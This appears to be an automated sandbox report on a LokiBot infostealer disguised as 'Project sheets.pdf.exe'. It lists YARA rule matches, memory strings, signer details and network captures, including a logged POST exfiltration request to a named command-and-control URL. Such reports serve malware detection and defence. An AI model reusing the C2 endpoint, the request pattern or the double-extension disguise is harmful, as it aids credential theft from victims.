Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UWOk8nrhWsKBKGWXSePgv8dtkyveOyzmxWIMZzvZ8izB2dT7YQLIajfAbJ7oAJ3TKxuCqWiHVj0DQF4T24Rpb8OGZKiBf8VDNmp0wuRdyBsttE%2FFj7le1FIprpYRXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5059ae8c9018-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KlaIcUFq%2FAKMZr8cKuA7oS9%2F0E%2FRgGaKflZWBKkiJ9ilDyY1Sft%2FkwrTIkWCTxABLWGIMhtPPWfpGj4bz8E23nuql8Rm%2Bdzkjxh4tE3Ibkx0blidQFfJSr%2FOC%2F23lg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5062ceb69128-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4dWgjRH38pyPZeD0qb0jk1%2F9qOz8xFjDAiF5Gi2i2AeNn31igXE4WwQOWYQHrpOyIGITs3%2Fzw1da6XTCKPX3NE8Mjee42nTkPpxBuY5u2IZKUgW5M0nLaa1piuJcXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e506a89e19271-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NwDeet%2BtDovGzYKRHtlc%2BIy9CvtPPAj%2FIhJEPstX1Ci1BEnwzlCsGh%2BuTY0Brr6ZBfTS8J8wHhv9vdUzelvtptMWlvXbpzGKUv3k3lh%2FjuysDwLv3KXOt2JS1GaA8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5074b917bb5b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c0pX9SJrHopzRCsEkDmDxwlNx0C41KoS8krJ5OgxEsOqET4277iXRW3J%2FWp2JHcXROzAxWooOe8cWiTJpbpDaNfjHGikivIw5A1OpyJxaquuggPEYvGU5TP02bgBIg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e507b3f7b91d8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A8uhSCBmIXKRlfuG%2F6EDgs3Nh9LOjKk3NdY%2BN9yfSiF3S03bDoGetakChdva7ldiD%2BvTJDuSTvIs7znKB4Lzu7%2BAAco8%2BiNoqOwzPZxCDqD3J%2FLSBTi0p%2Fy1e7TDzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5081f8b99b98-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Project sheets.pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: Project sheets.pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Project sheets.pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: Project sheets.pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Project sheets.pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Project sheets.pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Project sheets.pdf.exe	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Project sheets.pdf.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Project sheets.pdf.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Project sheets.pdf.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: Project sheets.pdf.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: Project sheets.pdf.exe	String found in binary or memory: http://ocsp.digicert.com0P
Source: Project sheets.pdf.exe	String found in binary or memory: http://ocsp.digicert.com0R
Source: Project sheets.pdf.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: cvtres.exe, cvtres.exe, 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: cvtres.exe, 00000003.00000002.500737023.000000000049F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://tixfilmz.gq/Devil/PWS/fre.php
Source: Project sheets.pdf.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 190Connection: close

Source: unknown

DNS traffic detected: queries for: tixfilmz.gq

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 3_2_00404ED4 recv,

3_2_00404ED4

Source: Project sheets.pdf.exe, 00000000.00000002.245726973.0000000001528000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Project sheets.pdf.exe

Detected potential unwanted application

Source: Project sheets.pdf.exe

PE Siganture Subject Chain: CN=Wen Jia Liu, O=Wen Jia Liu, L=Sydney, S=New South Wales, C=AU

Source: Project sheets.pdf.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
